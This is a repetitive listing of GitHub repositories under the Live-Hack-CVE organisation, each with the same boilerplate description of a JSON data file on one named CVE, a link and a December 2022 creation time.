**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32779 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32779](https://github.com/Live-Hack-CVE/CVE-2021-32779) create time: 2022-12-24T09:05:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21798](https://github.com/Live-Hack-CVE/CVE-2021-21798) create time: 2022-12-24T09:05:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34629](https://github.com/Live-Hack-CVE/CVE-2021-34629) create time: 2022-12-24T09:05:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24500](https://github.com/Live-Hack-CVE/CVE-2021-24500) create time: 2022-12-24T09:05:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22910 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22910](https://github.com/Live-Hack-CVE/CVE-2021-22910) create time: 2022-12-24T09:05:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25954 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25954](https://github.com/Live-Hack-CVE/CVE-2021-25954) create time: 2022-12-24T09:05:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21621](https://github.com/Live-Hack-CVE/CVE-2021-21621) create time: 2022-12-24T09:05:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21564 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21564](https://github.com/Live-Hack-CVE/CVE-2021-21564) create time: 2022-12-24T09:05:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2849 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2849](https://github.com/Live-Hack-CVE/CVE-2022-2849) create time: 2022-12-24T09:01:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2862](https://github.com/Live-Hack-CVE/CVE-2022-2862) create time: 2022-12-24T09:01:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2874](https://github.com/Live-Hack-CVE/CVE-2022-2874) create time: 2022-12-24T09:01:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2816](https://github.com/Live-Hack-CVE/CVE-2022-2816) create time: 2022-12-24T08:25:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2845](https://github.com/Live-Hack-CVE/CVE-2022-2845) create time: 2022-12-24T08:24:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2817 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2817](https://github.com/Live-Hack-CVE/CVE-2022-2817) create time: 2022-12-24T08:24:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1138 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1138](https://github.com/Live-Hack-CVE/CVE-2022-1138) create time: 2022-12-24T08:23:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1137 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1137](https://github.com/Live-Hack-CVE/CVE-2022-1137) create time: 2022-12-24T08:23:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1136](https://github.com/Live-Hack-CVE/CVE-2022-1136) create time: 2022-12-24T08:23:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1139](https://github.com/Live-Hack-CVE/CVE-2022-1139) create time: 2022-12-24T08:23:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1134 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1134](https://github.com/Live-Hack-CVE/CVE-2022-1134) create time: 2022-12-24T08:22:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1133](https://github.com/Live-Hack-CVE/CVE-2022-1133) create time: 2022-12-24T08:22:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1132 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1132](https://github.com/Live-Hack-CVE/CVE-2022-1132) create time: 2022-12-24T08:22:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1135](https://github.com/Live-Hack-CVE/CVE-2022-1135) create time: 2022-12-24T08:22:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1128](https://github.com/Live-Hack-CVE/CVE-2022-1128) create time: 2022-12-24T08:22:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1129](https://github.com/Live-Hack-CVE/CVE-2022-1129) create time: 2022-12-24T08:22:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1131 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1131](https://github.com/Live-Hack-CVE/CVE-2022-1131) create time: 2022-12-24T08:22:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2007 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2007](https://github.com/Live-Hack-CVE/CVE-2022-2007) create time: 2022-12-24T07:39:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2010](https://github.com/Live-Hack-CVE/CVE-2022-2010) create time: 2022-12-24T07:39:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2011](https://github.com/Live-Hack-CVE/CVE-2022-2011) create time: 2022-12-24T07:39:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-15095 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-15095](https://github.com/Live-Hack-CVE/CVE-2017-15095) create time: 2022-12-24T08:19:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20135](https://github.com/Live-Hack-CVE/CVE-2017-20135) create time: 2022-12-24T07:43:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20144](https://github.com/Live-Hack-CVE/CVE-2017-20144) create time: 2022-12-24T07:42:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27796 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27796](https://github.com/Live-Hack-CVE/CVE-2020-27796) create time: 2022-12-24T08:20:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25201](https://github.com/Live-Hack-CVE/CVE-2020-25201) create time: 2022-12-24T08:18:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28053 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28053](https://github.com/Live-Hack-CVE/CVE-2020-28053) create time: 2022-12-24T08:18:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25864](https://github.com/Live-Hack-CVE/CVE-2020-25864) create time: 2022-12-24T08:18:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22025 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22025](https://github.com/Live-Hack-CVE/CVE-2020-22025) create time: 2022-12-24T08:17:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22032](https://github.com/Live-Hack-CVE/CVE-2020-22032) create time: 2022-12-24T08:17:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12966](https://github.com/Live-Hack-CVE/CVE-2020-12966) create time: 2022-12-24T07:43:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23928](https://github.com/Live-Hack-CVE/CVE-2020-23928) create time: 2022-12-24T07:40:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23922](https://github.com/Live-Hack-CVE/CVE-2020-23922) create time: 2022-12-24T07:39:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23931](https://github.com/Live-Hack-CVE/CVE-2020-23931) create time: 2022-12-24T07:39:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23995](https://github.com/Live-Hack-CVE/CVE-2020-23995) create time: 2022-12-24T07:39:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24119](https://github.com/Live-Hack-CVE/CVE-2020-24119) create time: 2022-12-24T07:39:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24133](https://github.com/Live-Hack-CVE/CVE-2020-24133) create time: 2022-12-24T07:39:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23921 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23921](https://github.com/Live-Hack-CVE/CVE-2020-23921) create time: 2022-12-24T07:39:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22079 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22079](https://github.com/Live-Hack-CVE/CVE-2020-22079) create time: 2022-12-24T07:39:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23886](https://github.com/Live-Hack-CVE/CVE-2020-23886) create time: 2022-12-24T07:38:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23874](https://github.com/Live-Hack-CVE/CVE-2020-23874) create time: 2022-12-24T07:38:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23873 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23873](https://github.com/Live-Hack-CVE/CVE-2020-23873) create time: 2022-12-24T07:38:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17496](https://github.com/Live-Hack-CVE/CVE-2020-17496) create time: 2022-12-24T07:38:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23915 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23915](https://github.com/Live-Hack-CVE/CVE-2020-23915) create time: 2022-12-24T07:38:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22001](https://github.com/Live-Hack-CVE/CVE-2020-22001) create time: 2022-12-24T07:38:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17463](https://github.com/Live-Hack-CVE/CVE-2020-17463) create time: 2022-12-24T07:36:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21996](https://github.com/Live-Hack-CVE/CVE-2020-21996) create time: 2022-12-24T07:36:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21994](https://github.com/Live-Hack-CVE/CVE-2020-21994) create time: 2022-12-24T07:36:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21839](https://github.com/Live-Hack-CVE/CVE-2020-21839) create time: 2022-12-24T07:36:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21827](https://github.com/Live-Hack-CVE/CVE-2020-21827) create time: 2022-12-24T07:36:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23707](https://github.com/Live-Hack-CVE/CVE-2020-23707) create time: 2022-12-24T07:36:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30169 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30169](https://github.com/Live-Hack-CVE/CVE-2021-30169) create time: 2022-12-24T08:22:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29511 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29511](https://github.com/Live-Hack-CVE/CVE-2021-29511) create time: 2022-12-24T08:21:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21544](https://github.com/Live-Hack-CVE/CVE-2021-21544) create time: 2022-12-24T08:21:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31164](https://github.com/Live-Hack-CVE/CVE-2021-31164) create time: 2022-12-24T08:21:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3037](https://github.com/Live-Hack-CVE/CVE-2021-3037) create time: 2022-12-24T08:21:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30501 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30501](https://github.com/Live-Hack-CVE/CVE-2021-30501) create time: 2022-12-24T08:21:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24252 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24252](https://github.com/Live-Hack-CVE/CVE-2021-24252) create time: 2022-12-24T08:21:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31918](https://github.com/Live-Hack-CVE/CVE-2021-31918) create time: 2022-12-24T08:21:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3101](https://github.com/Live-Hack-CVE/CVE-2021-3101) create time: 2022-12-24T08:21:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31412 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31412](https://github.com/Live-Hack-CVE/CVE-2021-31412) create time: 2022-12-24T08:21:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32926](https://github.com/Live-Hack-CVE/CVE-2021-32926) create time: 2022-12-24T08:21:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32933](https://github.com/Live-Hack-CVE/CVE-2021-32933) create time: 2022-12-24T08:20:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32942](https://github.com/Live-Hack-CVE/CVE-2021-32942) create time: 2022-12-24T08:20:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32986](https://github.com/Live-Hack-CVE/CVE-2021-32986) create time: 2022-12-24T08:20:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1836](https://github.com/Live-Hack-CVE/CVE-2021-1836) create time: 2022-12-24T08:20:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29501 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29501](https://github.com/Live-Hack-CVE/CVE-2021-29501) create time: 2022-12-24T08:20:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29502 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29502](https://github.com/Live-Hack-CVE/CVE-2021-29502) create time: 2022-12-24T08:20:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27385](https://github.com/Live-Hack-CVE/CVE-2021-27385) create time: 2022-12-24T08:19:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29575 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29575](https://github.com/Live-Hack-CVE/CVE-2021-29575) create time: 2022-12-24T08:19:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3750 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3750](https://github.com/Live-Hack-CVE/CVE-2021-3750) create time: 2022-12-24T08:19:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29612 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29612](https://github.com/Live-Hack-CVE/CVE-2021-29612) create time: 2022-12-24T08:19:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29610 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29610](https://github.com/Live-Hack-CVE/CVE-2021-29610) create time: 2022-12-24T08:19:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3930](https://github.com/Live-Hack-CVE/CVE-2021-3930) create time: 2022-12-24T08:19:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3947](https://github.com/Live-Hack-CVE/CVE-2021-3947) create time: 2022-12-24T08:19:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3503 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3503](https://github.com/Live-Hack-CVE/CVE-2021-3503) create time: 2022-12-24T08:19:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3544](https://github.com/Live-Hack-CVE/CVE-2021-3544) create time: 2022-12-24T08:19:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3545](https://github.com/Live-Hack-CVE/CVE-2021-3545) create time: 2022-12-24T08:19:08Z

